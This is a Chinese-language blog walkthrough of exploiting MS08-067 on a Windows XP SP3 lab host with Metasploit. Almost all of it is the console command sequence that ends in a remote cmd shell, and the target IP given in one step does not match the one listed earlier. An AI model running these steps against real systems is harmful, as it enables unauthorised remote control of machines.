metasploit利用ms08_067

(1)测试环境

     目标主机  XP SP3 简体中文版   IP  192.168.49.128

(2)测试过程

1)选择exploit模块    use exploit/windows/smb/ms08_067_netapi

      如果不知道ms08_067的具体位置  可以使用search ms08_067

     2)选择payload      set PAYLOAD windows/shell/bind_tcp

查看需要设置的参数  show options


3)设置目标主机  set RHOST 192.168.40.128

设置目标主机端口  set LPORT 5555

        设置目标的版本号  使用 show targets 查看版本号




    可以看到 sp3 简体中文版的id 是 41

  set TARGET 41



         4)查看所有选项是否设置好  show options



(3)进行渗透测试    exploit

      等待一段时间后,获取目标主机的cmd权限



(4)将对目标主机的控制权保存到sessions中

  命令:  sessions -i 1重新获取对目标主机的控制权
说明:我的BT5是英文版的,不支持中文



没有更多推荐了,返回首页